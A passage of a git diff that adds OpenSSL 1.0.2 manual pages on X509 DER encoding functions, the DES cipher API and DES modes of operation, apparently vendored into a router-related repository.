+i2d_X509() encodes the structure pointed to by B<x> into DER format.
+If B<out> is not B<NULL> is writes the DER encoded data to the buffer
+at B<*out>, and increments it to point after the data just written.
+If the return value is negative an error occurred, otherwise it
+returns the length of the encoded data. 
+
+For OpenSSL 0.9.7 and later if B<*out> is B<NULL> memory will be
+allocated for a buffer and the encoded data written to it. In this
+case B<*out> is not incremented and it points to the start of the
+data just written.
+
+d2i_X509_bio() is similar to d2i_X509() except it attempts
+to parse data from BIO B<bp>.
+
+d2i_X509_fp() is similar to d2i_X509() except it attempts
+to parse data from FILE pointer B<fp>.
+
+i2d_X509_bio() is similar to i2d_X509() except it writes
+the encoding of the structure B<x> to BIO B<bp> and it
+returns 1 for success and 0 for failure.
+
+i2d_X509_fp() is similar to i2d_X509() except it writes
+the encoding of the structure B<x> to BIO B<bp> and it
+returns 1 for success and 0 for failure.
+
+i2d_re_X509_tbs() is similar to i2d_X509() except it encodes
+only the TBSCertificate portion of the certificate.
+
+=head1 NOTES
+
+The letters B<i> and B<d> in for example B<i2d_X509> stand for
+"internal" (that is an internal C structure) and "DER". So
+B<i2d_X509> converts from internal to DER. The "re" in
+B<i2d_re_X509_tbs> stands for "re-encode", and ensures that a fresh
+encoding is generated in case the object has been modified after
+creation (see the BUGS section).
+
+The functions can also understand B<BER> forms.
+
+The actual X509 structure passed to i2d_X509() must be a valid
+populated B<X509> structure it can B<not> simply be fed with an
+empty structure such as that returned by X509_new().
+
+The encoded data is in binary form and may contain embedded zeroes.
+Therefore any FILE pointers or BIOs should be opened in binary mode.
+Functions such as B<strlen()> will B<not> return the correct length
+of the encoded structure.
+
+The ways that B<*in> and B<*out> are incremented after the operation
+can trap the unwary. See the B<WARNINGS> section for some common
+errors.
+
+The reason for the auto increment behaviour is to reflect a typical
+usage of ASN1 functions: after one structure is encoded or decoded
+another will processed after it.
+
+=head1 EXAMPLES
+
+Allocate and encode the DER encoding of an X509 structure:
+
+ int len;
+ unsigned char *buf, *p;
+
+ len = i2d_X509(x, NULL);
+
+ buf = OPENSSL_malloc(len);
+
+ if (buf == NULL)
+	/* error */
+
+ p = buf;
+
+ i2d_X509(x, &p);
+
+If you are using OpenSSL 0.9.7 or later then this can be
+simplified to:
+
+
+ int len;
+ unsigned char *buf;
+
+ buf = NULL;
+
+ len = i2d_X509(x, &buf);
+
+ if (len < 0)
+	/* error */
+
+Attempt to decode a buffer:
+
+ X509 *x;
+
+ unsigned char *buf, *p;
+
+ int len;
+
+ /* Something to setup buf and len */
+
+ p = buf;
+
+ x = d2i_X509(NULL, &p, len);
+
+ if (x == NULL)
+    /* Some error */
+
+Alternative technique:
+
+ X509 *x;
+
+ unsigned char *buf, *p;
+
+ int len;
+
+ /* Something to setup buf and len */
+
+ p = buf;
+
+ x = NULL;
+
+ if(!d2i_X509(&x, &p, len))
+    /* Some error */
+
+
+=head1 WARNINGS
+
+The use of temporary variable is mandatory. A common
+mistake is to attempt to use a buffer directly as follows:
+
+ int len;
+ unsigned char *buf;
+
+ len = i2d_X509(x, NULL);
+
+ buf = OPENSSL_malloc(len);
+
+ if (buf == NULL)
+	/* error */
+
+ i2d_X509(x, &buf);
+
+ /* Other stuff ... */
+
+ OPENSSL_free(buf);
+
+This code will result in B<buf> apparently containing garbage because
+it was incremented after the call to point after the data just written.
+Also B<buf> will no longer contain the pointer allocated by B<OPENSSL_malloc()>
+and the subsequent call to B<OPENSSL_free()> may well crash.
+
+The auto allocation feature (setting buf to NULL) only works on OpenSSL
+0.9.7 and later. Attempts to use it on earlier versions will typically
+cause a segmentation violation.
+
+Another trap to avoid is misuse of the B<xp> argument to B<d2i_X509()>:
+
+ X509 *x;
+
+ if (!d2i_X509(&x, &p, len))
+	/* Some error */
+
+This will probably crash somewhere in B<d2i_X509()>. The reason for this
+is that the variable B<x> is uninitialized and an attempt will be made to
+interpret its (invalid) value as an B<X509> structure, typically causing
+a segmentation violation. If B<x> is set to NULL first then this will not
+happen.
+
+=head1 BUGS
+
+In some versions of OpenSSL the "reuse" behaviour of d2i_X509() when 
+B<*px> is valid is broken and some parts of the reused structure may
+persist if they are not present in the new one. As a result the use
+of this "reuse" behaviour is strongly discouraged.
+
+i2d_X509() will not return an error in many versions of OpenSSL,
+if mandatory fields are not initialized due to a programming error
+then the encoded structure may contain invalid data or omit the
+fields entirely and will not be parsed by d2i_X509(). This may be
+fixed in future so code should not assume that i2d_X509() will
+always succeed.
+
+The encoding of the TBSCertificate portion of a certificate is cached
+in the B<X509> structure internally to improve encoding performance
+and to ensure certificate signatures are verified correctly in some
+certificates with broken (non-DER) encodings.
+
+Any function which encodes an X509 structure such as i2d_X509(),
+i2d_X509_fp() or i2d_X509_bio() may return a stale encoding if the
+B<X509> structure has been modified after deserialization or previous
+serialization.
+
+If, after modification, the B<X509> object is re-signed with X509_sign(),
+the encoding is automatically renewed. Otherwise, the encoding of the
+TBSCertificate portion of the B<X509> can be manually renewed by calling
+i2d_re_X509_tbs().
+
+=head1 RETURN VALUES
+
+d2i_X509(), d2i_X509_bio() and d2i_X509_fp() return a valid B<X509> structure
+or B<NULL> if an error occurs. The error code that can be obtained by
+L<ERR_get_error(3)|ERR_get_error(3)>. 
+
+i2d_X509() returns the number of bytes successfully encoded or a negative
+value if an error occurs. The error code can be obtained by
+L<ERR_get_error(3)|ERR_get_error(3)>. 
+
+i2d_X509_bio() and i2d_X509_fp() return 1 for success and 0 if an error 
+occurs The error code can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>. 
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>
+
+=head1 HISTORY
+
+d2i_X509, i2d_X509, d2i_X509_bio, d2i_X509_fp, i2d_X509_bio and i2d_X509_fp
+are available in all versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_X509_ALGOR.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_X509_ALGOR.pod
new file mode 100644
index 0000000..9e5cd92
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_X509_ALGOR.pod
@@ -0,0 +1,30 @@
+=pod
+
+=head1 NAME
+
+d2i_X509_ALGOR, i2d_X509_ALGOR - AlgorithmIdentifier functions.
+
+=head1 SYNOPSIS
+
+ #include <openssl/x509.h>
+
+ X509_ALGOR *d2i_X509_ALGOR(X509_ALGOR **a, unsigned char **pp, long length);
+ int i2d_X509_ALGOR(X509_ALGOR *a, unsigned char **pp);
+
+=head1 DESCRIPTION
+
+These functions decode and encode an B<X509_ALGOR> structure which is
+equivalent to the B<AlgorithmIdentifier> structure.
+
+Othewise these behave in a similar way to d2i_X509() and i2d_X509()
+described in the L<d2i_X509(3)|d2i_X509(3)> manual page.
+
+=head1 SEE ALSO
+
+L<d2i_X509(3)|d2i_X509(3)>
+
+=head1 HISTORY
+
+TBA
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_X509_CRL.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_X509_CRL.pod
new file mode 100644
index 0000000..675d38b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_X509_CRL.pod
@@ -0,0 +1,37 @@
+=pod
+
+=head1 NAME
+
+d2i_X509_CRL, i2d_X509_CRL, d2i_X509_CRL_bio, d2i_X509_CRL_fp,
+i2d_X509_CRL_bio, i2d_X509_CRL_fp - PKCS#10 certificate request functions.
+
+=head1 SYNOPSIS
+
+ #include <openssl/x509.h>
+
+ X509_CRL *d2i_X509_CRL(X509_CRL **a, const unsigned char **pp, long length);
+ int i2d_X509_CRL(X509_CRL *a, unsigned char **pp);
+
+ X509_CRL *d2i_X509_CRL_bio(BIO *bp, X509_CRL **x);
+ X509_CRL *d2i_X509_CRL_fp(FILE *fp, X509_CRL **x);
+
+ int i2d_X509_CRL_bio(BIO *bp, X509_CRL *x);
+ int i2d_X509_CRL_fp(FILE *fp, X509_CRL *x);
+
+=head1 DESCRIPTION
+
+These functions decode and encode an X509 CRL (certificate revocation
+list).
+
+Othewise the functions behave in a similar way to d2i_X509() and i2d_X509()
+described in the L<d2i_X509(3)|d2i_X509(3)> manual page.
+
+=head1 SEE ALSO
+
+L<d2i_X509(3)|d2i_X509(3)>
+
+=head1 HISTORY
+
+TBA
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_X509_NAME.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_X509_NAME.pod
new file mode 100644
index 0000000..343ffe1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_X509_NAME.pod
@@ -0,0 +1,31 @@
+=pod
+
+=head1 NAME
+
+d2i_X509_NAME, i2d_X509_NAME - X509_NAME encoding functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/x509.h>
+
+ X509_NAME *d2i_X509_NAME(X509_NAME **a, unsigned char **pp, long length);
+ int i2d_X509_NAME(X509_NAME *a, unsigned char **pp);
+
+=head1 DESCRIPTION
+
+These functions decode and encode an B<X509_NAME> structure which is the
+the same as the B<Name> type defined in RFC2459 (and elsewhere) and used
+for example in certificate subject and issuer names.
+
+Othewise the functions behave in a similar way to d2i_X509() and i2d_X509()
+described in the L<d2i_X509(3)|d2i_X509(3)> manual page.
+
+=head1 SEE ALSO
+
+L<d2i_X509(3)|d2i_X509(3)>
+
+=head1 HISTORY
+
+TBA
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_X509_REQ.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_X509_REQ.pod
new file mode 100644
index 0000000..91c0c19
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_X509_REQ.pod
@@ -0,0 +1,36 @@
+=pod
+
+=head1 NAME
+
+d2i_X509_REQ, i2d_X509_REQ, d2i_X509_REQ_bio, d2i_X509_REQ_fp,
+i2d_X509_REQ_bio, i2d_X509_REQ_fp - PKCS#10 certificate request functions.
+
+=head1 SYNOPSIS
+
+ #include <openssl/x509.h>
+
+ X509_REQ *d2i_X509_REQ(X509_REQ **a, const unsigned char **pp, long length);
+ int i2d_X509_REQ(X509_REQ *a, unsigned char **pp);
+
+ X509_REQ *d2i_X509_REQ_bio(BIO *bp, X509_REQ **x);
+ X509_REQ *d2i_X509_REQ_fp(FILE *fp, X509_REQ **x);
+
+ int i2d_X509_REQ_bio(BIO *bp, X509_REQ *x);
+ int i2d_X509_REQ_fp(FILE *fp, X509_REQ *x);
+
+=head1 DESCRIPTION
+
+These functions decode and encode a PKCS#10 certificate request.
+
+Othewise these behave in a similar way to d2i_X509() and i2d_X509()
+described in the L<d2i_X509(3)|d2i_X509(3)> manual page.
+
+=head1 SEE ALSO
+
+L<d2i_X509(3)|d2i_X509(3)>
+
+=head1 HISTORY
+
+TBA
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_X509_SIG.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_X509_SIG.pod
new file mode 100644
index 0000000..e48fd79
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/d2i_X509_SIG.pod
@@ -0,0 +1,30 @@
+=pod
+
+=head1 NAME
+
+d2i_X509_SIG, i2d_X509_SIG - DigestInfo functions.
+
+=head1 SYNOPSIS
+
+ #include <openssl/x509.h>
+
+ X509_SIG *d2i_X509_SIG(X509_SIG **a, unsigned char **pp, long length);
+ int i2d_X509_SIG(X509_SIG *a, unsigned char **pp);
+
+=head1 DESCRIPTION
+
+These functions decode and encode an X509_SIG structure which is
+equivalent to the B<DigestInfo> structure defined in PKCS#1 and PKCS#7.
+
+Othewise these behave in a similar way to d2i_X509() and i2d_X509()
+described in the L<d2i_X509(3)|d2i_X509(3)> manual page.
+
+=head1 SEE ALSO
+
+L<d2i_X509(3)|d2i_X509(3)>
+
+=head1 HISTORY
+
+TBA
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/des.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/des.pod
new file mode 100644
index 0000000..e1add56
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/des.pod
@@ -0,0 +1,357 @@
+=pod
+
+=head1 NAME
+
+DES_random_key, DES_set_key, DES_key_sched, DES_set_key_checked,
+DES_set_key_unchecked, DES_set_odd_parity, DES_is_weak_key,
+DES_ecb_encrypt, DES_ecb2_encrypt, DES_ecb3_encrypt, DES_ncbc_encrypt,
+DES_cfb_encrypt, DES_ofb_encrypt, DES_pcbc_encrypt, DES_cfb64_encrypt,
+DES_ofb64_encrypt, DES_xcbc_encrypt, DES_ede2_cbc_encrypt,
+DES_ede2_cfb64_encrypt, DES_ede2_ofb64_encrypt, DES_ede3_cbc_encrypt,
+DES_ede3_cbcm_encrypt, DES_ede3_cfb64_encrypt, DES_ede3_ofb64_encrypt,
+DES_cbc_cksum, DES_quad_cksum, DES_string_to_key, DES_string_to_2keys,
+DES_fcrypt, DES_crypt, DES_enc_read, DES_enc_write - DES encryption
+
+=head1 SYNOPSIS
+
+ #include <openssl/des.h>
+
+ void DES_random_key(DES_cblock *ret);
+
+ int DES_set_key(const_DES_cblock *key, DES_key_schedule *schedule);
+ int DES_key_sched(const_DES_cblock *key, DES_key_schedule *schedule);
+ int DES_set_key_checked(const_DES_cblock *key,
+        DES_key_schedule *schedule);
+ void DES_set_key_unchecked(const_DES_cblock *key,
+        DES_key_schedule *schedule);
+
+ void DES_set_odd_parity(DES_cblock *key);
+ int DES_is_weak_key(const_DES_cblock *key);
+
+ void DES_ecb_encrypt(const_DES_cblock *input, DES_cblock *output, 
+        DES_key_schedule *ks, int enc);
+ void DES_ecb2_encrypt(const_DES_cblock *input, DES_cblock *output, 
+        DES_key_schedule *ks1, DES_key_schedule *ks2, int enc);
+ void DES_ecb3_encrypt(const_DES_cblock *input, DES_cblock *output, 
+        DES_key_schedule *ks1, DES_key_schedule *ks2, 
+        DES_key_schedule *ks3, int enc);
+
+ void DES_ncbc_encrypt(const unsigned char *input, unsigned char *output, 
+        long length, DES_key_schedule *schedule, DES_cblock *ivec, 
+        int enc);
+ void DES_cfb_encrypt(const unsigned char *in, unsigned char *out,
+        int numbits, long length, DES_key_schedule *schedule,
+        DES_cblock *ivec, int enc);
+ void DES_ofb_encrypt(const unsigned char *in, unsigned char *out,
+        int numbits, long length, DES_key_schedule *schedule,
+        DES_cblock *ivec);
+ void DES_pcbc_encrypt(const unsigned char *input, unsigned char *output, 
+        long length, DES_key_schedule *schedule, DES_cblock *ivec, 
+        int enc);
+ void DES_cfb64_encrypt(const unsigned char *in, unsigned char *out,
+        long length, DES_key_schedule *schedule, DES_cblock *ivec,
+        int *num, int enc);
+ void DES_ofb64_encrypt(const unsigned char *in, unsigned char *out,
+        long length, DES_key_schedule *schedule, DES_cblock *ivec,
+        int *num);
+
+ void DES_xcbc_encrypt(const unsigned char *input, unsigned char *output, 
+        long length, DES_key_schedule *schedule, DES_cblock *ivec, 
+        const_DES_cblock *inw, const_DES_cblock *outw, int enc);
+
+ void DES_ede2_cbc_encrypt(const unsigned char *input,
+        unsigned char *output, long length, DES_key_schedule *ks1,
+        DES_key_schedule *ks2, DES_cblock *ivec, int enc);
+ void DES_ede2_cfb64_encrypt(const unsigned char *in,
+        unsigned char *out, long length, DES_key_schedule *ks1,
+        DES_key_schedule *ks2, DES_cblock *ivec, int *num, int enc);
+ void DES_ede2_ofb64_encrypt(const unsigned char *in,
+        unsigned char *out, long length, DES_key_schedule *ks1,
+        DES_key_schedule *ks2, DES_cblock *ivec, int *num);
+
+ void DES_ede3_cbc_encrypt(const unsigned char *input,
+        unsigned char *output, long length, DES_key_schedule *ks1,
+        DES_key_schedule *ks2, DES_key_schedule *ks3, DES_cblock *ivec,
+        int enc);
+ void DES_ede3_cbcm_encrypt(const unsigned char *in, unsigned char *out, 
+        long length, DES_key_schedule *ks1, DES_key_schedule *ks2, 
+        DES_key_schedule *ks3, DES_cblock *ivec1, DES_cblock *ivec2, 
+        int enc);
+ void DES_ede3_cfb64_encrypt(const unsigned char *in, unsigned char *out, 
+        long length, DES_key_schedule *ks1, DES_key_schedule *ks2,
+        DES_key_schedule *ks3, DES_cblock *ivec, int *num, int enc);
+ void DES_ede3_ofb64_encrypt(const unsigned char *in, unsigned char *out, 
+        long length, DES_key_schedule *ks1, 
+        DES_key_schedule *ks2, DES_key_schedule *ks3, 
+        DES_cblock *ivec, int *num);
+
+ DES_LONG DES_cbc_cksum(const unsigned char *input, DES_cblock *output, 
+        long length, DES_key_schedule *schedule, 
+        const_DES_cblock *ivec);
+ DES_LONG DES_quad_cksum(const unsigned char *input, DES_cblock output[], 
+        long length, int out_count, DES_cblock *seed);
+ void DES_string_to_key(const char *str, DES_cblock *key);
+ void DES_string_to_2keys(const char *str, DES_cblock *key1,
+        DES_cblock *key2);
+
+ char *DES_fcrypt(const char *buf, const char *salt, char *ret);
+ char *DES_crypt(const char *buf, const char *salt);
+
+ int DES_enc_read(int fd, void *buf, int len, DES_key_schedule *sched,
+        DES_cblock *iv);
+ int DES_enc_write(int fd, const void *buf, int len,
+        DES_key_schedule *sched, DES_cblock *iv);
+
+=head1 DESCRIPTION
+
+This library contains a fast implementation of the DES encryption
+algorithm.
+
+There are two phases to the use of DES encryption.  The first is the
+generation of a I<DES_key_schedule> from a key, the second is the
+actual encryption.  A DES key is of type I<DES_cblock>. This type is
+consists of 8 bytes with odd parity.  The least significant bit in
+each byte is the parity bit.  The key schedule is an expanded form of
+the key; it is used to speed the encryption process.
+
+DES_random_key() generates a random key.  The PRNG must be seeded
+prior to using this function (see L<rand(3)|rand(3)>).  If the PRNG
+could not generate a secure key, 0 is returned.
+
+Before a DES key can be used, it must be converted into the
+architecture dependent I<DES_key_schedule> via the
+DES_set_key_checked() or DES_set_key_unchecked() function.
+
+DES_set_key_checked() will check that the key passed is of odd parity
+and is not a week or semi-weak key.  If the parity is wrong, then -1
+is returned.  If the key is a weak key, then -2 is returned.  If an
+error is returned, the key schedule is not generated.
+
+DES_set_key() works like
+DES_set_key_checked() if the I<DES_check_key> flag is non-zero,
+otherwise like DES_set_key_unchecked().  These functions are available
+for compatibility; it is recommended to use a function that does not
+depend on a global variable.
+
+DES_set_odd_parity() sets the parity of the passed I<key> to odd.
+
+DES_is_weak_key() returns 1 if the passed key is a weak key, 0 if it
+is ok.  
+
+The following routines mostly operate on an input and output stream of
+I<DES_cblock>s.
+
+DES_ecb_encrypt() is the basic DES encryption routine that encrypts or
+decrypts a single 8-byte I<DES_cblock> in I<electronic code book>
+(ECB) mode.  It always transforms the input data, pointed to by
+I<input>, into the output data, pointed to by the I<output> argument.
+If the I<encrypt> argument is non-zero (DES_ENCRYPT), the I<input>
+(cleartext) is encrypted in to the I<output> (ciphertext) using the
+key_schedule specified by the I<schedule> argument, previously set via
+I<DES_set_key>. If I<encrypt> is zero (DES_DECRYPT), the I<input> (now
+ciphertext) is decrypted into the I<output> (now cleartext).  Input
+and output may overlap.  DES_ecb_encrypt() does not return a value.
+
+DES_ecb3_encrypt() encrypts/decrypts the I<input> block by using
+three-key Triple-DES encryption in ECB mode.  This involves encrypting
+the input with I<ks1>, decrypting with the key schedule I<ks2>, and
+then encrypting with I<ks3>.  This routine greatly reduces the chances
+of brute force breaking of DES and has the advantage of if I<ks1>,
+I<ks2> and I<ks3> are the same, it is equivalent to just encryption
+using ECB mode and I<ks1> as the key.
+
+The macro DES_ecb2_encrypt() is provided to perform two-key Triple-DES
+encryption by using I<ks1> for the final encryption.
+
+DES_ncbc_encrypt() encrypts/decrypts using the I<cipher-block-chaining>
+(CBC) mode of DES.  If the I<encrypt> argument is non-zero, the
+routine cipher-block-chain encrypts the cleartext data pointed to by
+the I<input> argument into the ciphertext pointed to by the I<output>
+argument, using the key schedule provided by the I<schedule> argument,
+and initialization vector provided by the I<ivec> argument.  If the
+I<length> argument is not an integral multiple of eight bytes, the
+last block is copied to a temporary area and zero filled.  The output
+is always an integral multiple of eight bytes.
+
+DES_xcbc_encrypt() is RSA's DESX mode of DES.  It uses I<inw> and
+I<outw> to 'whiten' the encryption.  I<inw> and I<outw> are secret
+(unlike the iv) and are as such, part of the key.  So the key is sort
+of 24 bytes.  This is much better than CBC DES.
+
+DES_ede3_cbc_encrypt() implements outer triple CBC DES encryption with
+three keys. This means that each DES operation inside the CBC mode is
+an C<C=E(ks3,D(ks2,E(ks1,M)))>.  This mode is used by SSL.
+
+The DES_ede2_cbc_encrypt() macro implements two-key Triple-DES by
+reusing I<ks1> for the final encryption.  C<C=E(ks1,D(ks2,E(ks1,M)))>.
+This form of Triple-DES is used by the RSAREF library.
+
+DES_pcbc_encrypt() encrypt/decrypts using the propagating cipher block
+chaining mode used by Kerberos v4. Its parameters are the same as
+DES_ncbc_encrypt().
+
+DES_cfb_encrypt() encrypt/decrypts using cipher feedback mode.  This
+method takes an array of characters as input and outputs and array of
+characters.  It does not require any padding to 8 character groups.
+Note: the I<ivec> variable is changed and the new changed value needs to
+be passed to the next call to this function.  Since this function runs
+a complete DES ECB encryption per I<numbits>, this function is only
+suggested for use when sending small numbers of characters.
+
+DES_cfb64_encrypt()
+implements CFB mode of DES with 64bit feedback.  Why is this
+useful you ask?  Because this routine will allow you to encrypt an
+arbitrary number of bytes, no 8 byte padding.  Each call to this
+routine will encrypt the input bytes to output and then update ivec
+and num.  num contains 'how far' we are though ivec.  If this does
+not make much sense, read more about cfb mode of DES :-).
+
+DES_ede3_cfb64_encrypt() and DES_ede2_cfb64_encrypt() is the same as
+DES_cfb64_encrypt() except that Triple-DES is used.
+
+DES_ofb_encrypt() encrypts using output feedback mode.  This method
+takes an array of characters as input and outputs and array of
+characters.  It does not require any padding to 8 character groups.
+Note: the I<ivec> variable is changed and the new changed value needs to
+be passed to the next call to this function.  Since this function runs
+a complete DES ECB encryption per numbits, this function is only
+suggested for use when sending small numbers of characters.
+
+DES_ofb64_encrypt() is the same as DES_cfb64_encrypt() using Output
+Feed Back mode.
+
+DES_ede3_ofb64_encrypt() and DES_ede2_ofb64_encrypt() is the same as
+DES_ofb64_encrypt(), using Triple-DES.
+
+The following functions are included in the DES library for
+compatibility with the MIT Kerberos library.
+
+DES_cbc_cksum() produces an 8 byte checksum based on the input stream
+(via CBC encryption).  The last 4 bytes of the checksum are returned
+and the complete 8 bytes are placed in I<output>. This function is
+used by Kerberos v4.  Other applications should use
+L<EVP_DigestInit(3)|EVP_DigestInit(3)> etc. instead.
+
+DES_quad_cksum() is a Kerberos v4 function.  It returns a 4 byte
+checksum from the input bytes.  The algorithm can be iterated over the
+input, depending on I<out_count>, 1, 2, 3 or 4 times.  If I<output> is
+non-NULL, the 8 bytes generated by each pass are written into
+I<output>.
+
+The following are DES-based transformations:
+
+DES_fcrypt() is a fast version of the Unix crypt(3) function.  This
+version takes only a small amount of space relative to other fast
+crypt() implementations.  This is different to the normal crypt in
+that the third parameter is the buffer that the return value is
+written into.  It needs to be at least 14 bytes long.  This function
+is thread safe, unlike the normal crypt.
+
+DES_crypt() is a faster replacement for the normal system crypt().
+This function calls DES_fcrypt() with a static array passed as the
+third parameter.  This emulates the normal non-thread safe semantics
+of crypt(3).
+
+DES_enc_write() writes I<len> bytes to file descriptor I<fd> from
+buffer I<buf>. The data is encrypted via I<pcbc_encrypt> (default)
+using I<sched> for the key and I<iv> as a starting vector.  The actual
+data send down I<fd> consists of 4 bytes (in network byte order)
+containing the length of the following encrypted data.  The encrypted
+data then follows, padded with random data out to a multiple of 8
+bytes.
+
+DES_enc_read() is used to read I<len> bytes from file descriptor
+I<fd> into buffer I<buf>. The data being read from I<fd> is assumed to
+have come from DES_enc_write() and is decrypted using I<sched> for
+the key schedule and I<iv> for the initial vector.
+
+B<Warning:> The data format used by DES_enc_write() and DES_enc_read()
+has a cryptographic weakness: When asked to write more than MAXWRITE
+bytes, DES_enc_write() will split the data into several chunks that
+are all encrypted using the same IV.  So don't use these functions
+unless you are sure you know what you do (in which case you might not
+want to use them anyway).  They cannot handle non-blocking sockets.
+DES_enc_read() uses an internal state and thus cannot be used on
+multiple files.
+
+I<DES_rw_mode> is used to specify the encryption mode to use with
+DES_enc_read() and DES_end_write().  If set to I<DES_PCBC_MODE> (the
+default), DES_pcbc_encrypt is used.  If set to I<DES_CBC_MODE>
+DES_cbc_encrypt is used.
+
+=head1 NOTES
+
+Single-key DES is insecure due to its short key size.  ECB mode is
+not suitable for most applications; see L<des_modes(7)|des_modes(7)>.
+
+The L<evp(3)|evp(3)> library provides higher-level encryption functions.
+
+=head1 BUGS
+
+DES_3cbc_encrypt() is flawed and must not be used in applications.
+
+DES_cbc_encrypt() does not modify B<ivec>; use DES_ncbc_encrypt()
+instead.
+
+DES_cfb_encrypt() and DES_ofb_encrypt() operates on input of 8 bits.
+What this means is that if you set numbits to 12, and length to 2, the
+first 12 bits will come from the 1st input byte and the low half of
+the second input byte.  The second 12 bits will have the low 8 bits
+taken from the 3rd input byte and the top 4 bits taken from the 4th
+input byte.  The same holds for output.  This function has been
+implemented this way because most people will be using a multiple of 8
+and because once you get into pulling bytes input bytes apart things
+get ugly!
+
+DES_string_to_key() is available for backward compatibility with the
+MIT library.  New applications should use a cryptographic hash function.
+The same applies for DES_string_to_2key().
+
+=head1 CONFORMING TO
+
+ANSI X3.106
+
+The B<des> library was written to be source code compatible with
+the MIT Kerberos library.
+
+=head1 SEE ALSO
+
+crypt(3), L<des_modes(7)|des_modes(7)>, L<evp(3)|evp(3)>, L<rand(3)|rand(3)>
+
+=head1 HISTORY
+
+In OpenSSL 0.9.7, all des_ functions were renamed to DES_ to avoid
+clashes with older versions of libdes.  Compatibility des_ functions
+are provided for a short while, as well as crypt().
+Declarations for these are in <openssl/des_old.h>. There is no DES_
+variant for des_random_seed().
+This will happen to other functions
+as well if they are deemed redundant (des_random_seed() just calls
+RAND_seed() and is present for backward compatibility only), buggy or
+already scheduled for removal.
+
+des_cbc_cksum(), des_cbc_encrypt(), des_ecb_encrypt(),
+des_is_weak_key(), des_key_sched(), des_pcbc_encrypt(),
+des_quad_cksum(), des_random_key() and des_string_to_key()
+are available in the MIT Kerberos library;
+des_check_key_parity(), des_fixup_key_parity() and des_is_weak_key()
+are available in newer versions of that library.
+
+des_set_key_checked() and des_set_key_unchecked() were added in
+OpenSSL 0.9.5.
+
+des_generate_random_block(), des_init_random_number_generator(),
+des_new_random_key(), des_set_random_generator_seed() and
+des_set_sequence_number() and des_rand_data() are used in newer
+versions of Kerberos but are not implemented here.
+
+des_random_key() generated cryptographically weak random data in
+SSLeay and in OpenSSL prior version 0.9.5, as well as in the original
+MIT library.
+
+=head1 AUTHOR
+
+Eric Young (eay@cryptsoft.com). Modified for the OpenSSL project
+(http://www.openssl.org).
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/des_modes.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/des_modes.pod
new file mode 100644
index 0000000..e883ca8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/des_modes.pod
@@ -0,0 +1,255 @@
+=pod
+
+=for comment openssl_manual_section:7
+
+=head1 NAME
+
+des_modes - the variants of DES and other crypto algorithms of OpenSSL
+
+=head1 DESCRIPTION
+
+Several crypto algorithms for OpenSSL can be used in a number of modes.  Those
+are used for using block ciphers in a way similar to stream ciphers, among
+other things.
+
+=head1 OVERVIEW
+
+=head2 Electronic Codebook Mode (ECB)
+
+Normally, this is found as the function I<algorithm>_ecb_encrypt().
+
+=over 2
+
+=item *
+
+64 bits are enciphered at a time.
+
+=item *
+
+The order of the blocks can be rearranged without detection.
+
+=item *
+
+The same plaintext block always produces the same ciphertext block
+(for the same key) making it vulnerable to a 'dictionary attack'.
+
+=item *
+
+An error will only affect one ciphertext block.
+
+=back
+
+=head2 Cipher Block Chaining Mode (CBC)
+
+Normally, this is found as the function I<algorithm>_cbc_encrypt().
+Be aware that des_cbc_encrypt() is not really DES CBC (it does
+not update the IV); use des_ncbc_encrypt() instead.
+
+=over 2
+
+=item *
+
+a multiple of 64 bits are enciphered at a time.
+
+=item *
+
+The CBC mode produces the same ciphertext whenever the same
+plaintext is encrypted using the same key and starting variable.
+
+=item *
+
+The chaining operation makes the ciphertext blocks dependent on the
+current and all preceding plaintext blocks and therefore blocks can not
+be rearranged.
+
+=item *
+
+The use of different starting variables prevents the same plaintext
+enciphering to the same ciphertext.
+
+=item *
+
+An error will affect the current and the following ciphertext blocks.
+
+=back
+
+=head2 Cipher Feedback Mode (CFB)
+
+Normally, this is found as the function I<algorithm>_cfb_encrypt().
+
+=over 2
+
+=item *
+
+a number of bits (j) <= 64 are enciphered at a time.
+
+=item *
+
+The CFB mode produces the same ciphertext whenever the same
+plaintext is encrypted using the same key and starting variable.
+
+=item *
+
+The chaining operation makes the ciphertext variables dependent on the
+current and all preceding variables and therefore j-bit variables are
+chained together and can not be rearranged.
+
+=item *
+
+The use of different starting variables prevents the same plaintext
+enciphering to the same ciphertext.
+
+=item *
+
